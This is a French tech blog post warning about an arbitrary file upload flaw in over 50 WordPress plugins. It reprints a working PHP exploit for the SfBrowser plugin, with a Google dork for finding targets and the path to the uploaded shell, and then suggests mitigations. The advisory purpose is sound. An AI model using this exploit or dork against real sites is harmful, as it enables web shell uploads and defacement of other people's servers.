Korben, roi d’internet, logo bébé avec des lunettes en mode thug life Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Korben Upgrade your mind

Alerte – 50 plugins WordPress troués !

Je viens de recevoir par email un adviso de la société Seraum spécialisée en sécurité informatique, qui a mis au jour une faille critique permettant l’upload de fichiers dans plus de 50 plugins WordPress. Du coup, c’est important que vous soyez au courant que si vous utilisez un de ces plugins, vous pouvez vous faire défacer en 2 secondes par un script kiddy qui n’aurait pas école aujourd’hui.

  • Homepage slideshow
  • 3D banner rotator
  • – Nmedia User File Uploader
  • – Front end upload
  • – Poverplay gallery
  • – WordPress Accordion Gallery
  • – Wp superb slideshow
  • – Wp-Property
  • – Video Gallery 1.3
  • – HTML5 Av Manager
  • – Royal Gallery
  • – 3D Flick Slideshow
  • – Image News Slider
  • – RBX Gallery
  • – wp-gpx-map
  • – File groups
  • – User Meta
  • – SfBrowser
  • – WPStoreCart
  • – Hungred Post Thumbnail
  • – MM Forms Community
  • – Tinymce Remind
  • – Gallery
  • – Thinkun Remind
  • – Foxypress
  • – PDW File Browser
  • – VideoWhisper
  • – WordPress Font Uploader
  • – FCChat Widget
  • – Comment Extra Fields
  • – Nmedia WordPress Member Conversation
  • – PictureSurf Gallery
  • – Really simple Gallery (probably vuln)
  • – PICA Photo Gallery
  • – Asset Manager
  • – Vertical slideshow
  • – Carousel slideshow
  • – Front file manager
  • – Omni secure files
  • – Mac photo gallery
  • – Smart slideshow
  • – Bliss Galery
  • – YASS
  • – Catpro Gallery
  • – Matrix Gallery
  • – Gallery Explorer
  • – Dreamwork Gallery
  • – Blaze slideshow
  • – Slideshow pro

Voici l’exploit en question appliqué à l’un de ces plugins :

###########################################################
#
# Exploit Title: WordPress SfBrowser Version 1.4.5 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/sfbrowser/connectors/php/
# Date: 11/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage: http://www.sjeiti.com/
# Software Link: http://downloads.wordpress.org/plugin/sfbrowser.zip
# Version: 1.4.5
#
###########################################################

Vuln page : http://mysite.com/wp-content/plugins/sfbrowser/connectors/php/sfbrowser.php

exploit :

<?php
$u= »C:Program Files (x86)EasyPHP-5.3.9wwwshell.ptxt »;
$c = curl_init(« http://127.0.0.1/wp/wp-content/plugins/sfbrowser/connectors/php/sfbrowser.php »);
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array(‘fileToUpload’=> »@$u »,
‘a’=> »upload »,
‘file’=> » »,
‘deny’=> »lam »,
‘allow’=> »ptxt|exe|sh »,
‘resize’=>array(0,0)));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>

shell Access : http://mysite.com/wp-content/plugins/sfbrowser/shell.ptxt

Pour se protéger, plusieurs possibilités à part virer le plugin vulnérable:

  • Placer un fichier .htaccess dans les dossiers de plugin
  • Placer des index.php vides dans les dossiers qui n’en ont pas
  • Inclure un appel aux variables ABSPATH ou session admin au début de chaque script php

Quand les dev font de la merde, les admins trinquent 😉

Bonne sécurisation à tous !

Merci à Adrien Thierry, l’auteur de cet exploit de m’avoir informé.

Il y a aussi ce site, learn to secure your WordPress Installation


Clavier Logitech K270

A seulement 31 €

Equipé du récepteur Logitech Unifying, un récepteur sans fil compact qui reste branché sur votre ordinateur portable (pas besoin de le débrancher lorsque vous vous déplacez) et permet de connecter votre clavier à des périphériques supplémentaires lorsque vous en avez besoin

Technologie de connectivité sans fil 2,4 GHz avancée de Logitech® d’une portée de 10 m et passage en mode de fréquence automatique.

Huit touches de raccourci.

Fonctionne avec 2 piles AAA.

En Savoir +



Installer le shell Bash (Linux) sous Windows 10

L’année dernière, ça ne vous a pas échappé, Bash a fait son apparition sous Windows 10. C’est pour moi, la meilleure chose qui soit arrivée à Windows depuis un moment, car ça permet de lancer des outils Linux et de développer ses propres scripts Shell directement sous Windows. Le pied !

Mais même si c’est parfaitement fonctionnel, il faut quand même…

Lire la suite


Plus de 60 idées pour votre Raspberry Pi

Nous sommes nombreux à nous être procuré un petit ordinateur Raspberry Pi pour nous lancer dans des projets de ouf malade… C’est très cool, mais à part le classique Media Center XBMC, qu’avez-vous fait avec votre Raspberry Pi ?

Si vous séchez niveau idées, voici une petite sélection…

Lire la suite


Une astuce pour rendre Windows 10 plus rapide

Si vous trouvez que Windows 10 est un peu lent, que vos applications ne se lancent pas très vite, que vos compilations prennent du temps, voici une petite astuce débusquée par Brominou pour accélérer le bouzin.

Cliquez dans la zone de recherche de la barre Windows et tapez le mot clé « Performances ». Puis cliquez sur « Régler l’apparence et les performances de Windows » …

Lire la suite


Changer d’adresse IP rapidement

Une petite astuce pour ceux qui ne connaissent pas. Comment changer d’adresse IP à la volée.
Il suffit d’en demander une nouvelle à son provider si celui-ci accepte les IP dynamiques. Pour vérifier que vos manipulation ont eu l’effet escompté, vérifiez quelle est votre adresse IP….

Lire la suite